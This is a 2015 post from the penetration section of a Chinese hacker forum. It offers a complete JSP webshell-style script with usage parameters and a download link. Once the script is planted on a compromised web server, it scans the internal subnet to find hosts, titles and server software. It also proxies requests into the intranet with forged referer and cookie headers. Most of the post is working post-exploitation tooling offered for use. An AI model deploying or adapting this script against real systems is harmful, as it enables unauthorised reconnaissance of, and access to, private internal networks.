搜索
中国白客联盟»论坛 Techniques 渗透入侵(Hacker attacks) jsp内网探测脚本&简单代理访问
返回列表 发新帖
查看: 672|回复: 0

jsp内网探测脚本&简单代理访问

[复制链接]
admin

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2015-9-9 21:48:00 | 显示全部楼层 |阅读模式
直接上图:
[/url]
[url=http://static.wooyun.org/upload/image/201509/2015090918524875746.jpg]
[/url]
[url=http://static.wooyun.org/upload/image/201509/2015090918530399061.jpg]
..
1.直接访问默认扫描当前IP的C段,获取标题、web容器.

2.可以自定义传入需要扫描的段,传入参数ip即可

3.代理访问参数为url,可简单的访问内网的web,对了,我还加载了网站里的css,做到尽量看上去和直接访问的效果一样


  1. <%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%>
  2. <%@ page isThreadSafe="false"%>
  3. <%@page import="java.io.PrintWriter"%>
  4. <%@page import="java.io.OutputStreamWriter"%>
  5. <%@page import="java.util.regex.Matcher"%>
  6. <%@page import="java.io.IOException"%>
  7. <%@page import="java.net.InetAddress"%>
  8. <%@page import="java.util.regex.Pattern"%>
  9. <%@page import="java.net.HttpURLConnection"%>
  10. <%@page import="java.util.concurrent.LinkedBlockingQueue"%>

  12. <%!final static List<String> list = new ArrayList<String>();
  13.   String referer = "";
  14.   String cookie = "";
  15.   String decode = "utf-8";
  16.   int thread = 100;

  18.   HttpURLConnection getHTTPConn(String urlString) {
  19.     try {
  20.       java.net.URL url = new java.net.URL(urlString);
  21.       java.net.HttpURLConnection conn = (java.net.HttpURLConnection) url
  22.           .openConnection();
  23.       conn.setRequestMethod("GET");
  24.       conn.addRequestProperty("User-Agent",
  25.           "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon;)");
  26.       conn.addRequestProperty("Accept-Encoding", "gzip");
  27.       conn.addRequestProperty("referer", referer);
  28.       conn.addRequestProperty("cookie", cookie);
  29.       //conn.setInstanceFollowRedirects(false);
  30.       conn.setConnectTimeout(3000);
  31.       conn.setReadTimeout(3000);

  33.       return conn;
  34.     } catch (Exception e) {
  35.       return null;
  36.     }
  37.   }

  39.   HttpURLConnection conn;

  41.   String getHtmlContext(HttpURLConnection conn, String decode) {
  42.     Map<String, Object> result = new HashMap<String, Object>();
  43.     try {

  45.       String code = "utf-8";
  46.       if (decode != null) {
  47.         code = decode;
  48.       }
  49.       StringBuffer html = new StringBuffer();
  50.       java.io.InputStreamReader isr = new java.io.InputStreamReader(
  51.           conn.getInputStream(), code);
  52.       java.io.BufferedReader br = new java.io.BufferedReader(isr);

  54.       String temp;
  55.       while ((temp = br.readLine()) != null) {
  56.         if (!temp.trim().equals("")) {
  57.           html.append(temp).append("\n");
  58.         }
  59.       }
  60.       br.close();
  61.       isr.close();
  62.       return html.toString();
  63.     } catch (Exception e) {
  64.       System.out.println("getHtmlContext:"+e.getMessage());
  65.       return "null";
  66.     }
  67.   }

  69.   String getServerType(HttpURLConnection conn) {
  70.     try {
  71.       return conn.getHeaderField("Server");
  72.     } catch (Exception e) {
  73.       return "null";
  74.     }

  76.   }

  78.   String getTitle(String htmlSource) {
  79.     try {
  80.       List<String> list = new ArrayList<String>();
  81.       String title = "";
  82.       Pattern pa = Pattern.compile("<title>.*?</title>");
  83.       Matcher ma = pa.matcher(htmlSource);
  84.       while (ma.find()) {
  85.         list.add(ma.group());
  86.       }
  87.       for (int i = 0; i < list.size(); i++) {
  88.         title = title + list.get(i);
  89.       }
  90.       return title.replaceAll("<.*?>", "");
  91.     } catch (Exception e) {
  92.       return null;
  93.     }
  94.   }

  96.   List<String> getCss(String html, String url, String decode) {
  97.     List<String> cssurl = new ArrayList<String>();
  98.     List<String> csscode = new ArrayList<String>();
  99.     try {

  101.       String title = "";
  102.       Pattern pa = Pattern.compile(".*href="(.*)[.]css");
  103.       Matcher ma = pa.matcher(html.toLowerCase());
  104.       while (ma.find()) {
  105.         cssurl.add(ma.group(1) + ".css");
  106.       }

  108.       for (int i = 0; i < cssurl.size(); i++) {
  109.         String cssuuu = url + "/" + cssurl.get(i);
  110.         String csshtml = "<style>"
  111.             + getHtmlContext(getHTTPConn(cssuuu), decode)
  112.             + "</style>";
  113.         csscode.add(csshtml);

  115.       }
  116.     } catch (Exception e) {
  117.       System.out.println("getCss:"+e.getMessage());
  118.     }
  119.     return csscode;

  121.   }

  123.   String getMyIPLocal() throws IOException {
  124.     InetAddress ia = InetAddress.getLocalHost();
  125.     return ia.getHostAddress();
  126.   }%>
  127. <%
  128.   String u = request.getParameter("url");
  129.   String ip = request.getParameter("ip");

  131.   if (u != null) {
  132.     decode = request.getParameter("decode");
  133.     String ref = request.getParameter("referer");
  134.     String cook = request.getParameter("cookie");
  135.     if (ref != null) {
  136.       referer = ref;
  137.     }
  138.     if (cook != null) {
  139.       cookie = cook;
  140.     }
  141.     String html = getHtmlContext(getHTTPConn(u), decode);
  142.     List<String> css = getCss(html, u, decode);
  143.     String csshtml = "";
  144.     if (!html.equals("null")) {

  146.       for (int i = 0; i < css.size(); i++) {
  147.         csshtml += css.get(i);
  148.       }
  149.       out.print(html + csshtml);
  150.     } else {
  151.       response.setStatus(HttpServletResponse.SC_NOT_FOUND);
  152.       out.print("请求失败!");
  153.     }

  155.     return;
  156.   }

  158.   else if (ip != null || u == null) {
  159.     String threadpp = (request.getParameter("thread"));
  160.     if (threadpp != null) {
  161.       thread = Integer.parseInt(threadpp);
  162.       System.out.println(threadpp);
  163.     }
  164.     try {
  165.       try {
  166.         String http = "http://";
  167.         String localIP = getMyIPLocal();
  168.         if (ip != null) {
  169.           localIP = ip;
  170.         }
  171.         String useIP = localIP.substring(0,
  172.             localIP.lastIndexOf(".") + 1);
  173.         final Queue<String> queue = new LinkedBlockingQueue<String>();
  174.         for (int i = 1; i <= 256; i++) {
  175.           String url = http + useIP + i;
  176.           queue.offer(url);
  177.         }
  178.         final JspWriter pw = out;
  179.         ThreadGroup tg = new ThreadGroup("c");
  180.         for (int i = 0; i < thread; i++) {
  181.           new Thread(tg, new Runnable() {
  182.             public void run() {
  183.               while (true) {
  184.                 String addr = queue.poll();
  185.                 if (addr != null) {
  186.                   System.out.println(addr);
  187.                   HttpURLConnection conn = getHTTPConn(addr);
  188.                   String html = getHtmlContext(conn,
  189.                       decode);
  190.                   String title = getTitle(html);
  191.                   String serverType = getServerType(conn);
  192.                   String status = !html
  193.                       .equals("null") ? "Success"
  194.                       : "Fail";
  195.                   if (html != null
  196.                       && !status.equals("Fail")) {
  197.                     try {
  198.                       pw.println(addr + "  >>  "+ title + ">>"+ serverType+ " >>" + status+ "<br/>");
  199.                     } catch (Exception e) {
  200.                       e.printStackTrace();
  201.                     }
  202.                   }
  203.                 } else {
  204.                   return;
  205.                 }
  206.               }
  207.             }
  208.           }).start();
  209.         }
  210.         while (tg.activeCount() != 0) {
  211.         }
  212.       } catch (Exception e) {
  213.         e.printStackTrace();
  214.       }
  215.     } catch (Exception e) {
  216.       out.println(e.toString());
  217.     }
  218.   }
  219. %>
复制代码

  1. 参数:
  2. ip [需要探测的ip段]

  4. url [需要请求的地址]

  6. 其他参数:

  8. thread [指定线程数]

  10. decode [指定编码]

  12. referer  [伪造referer]

  14. cookie [伪造cookie]
复制代码


Link:http://pan.baidu.com/s/1qWDsv3e

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x
过段时间可能会取消签到功能了
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表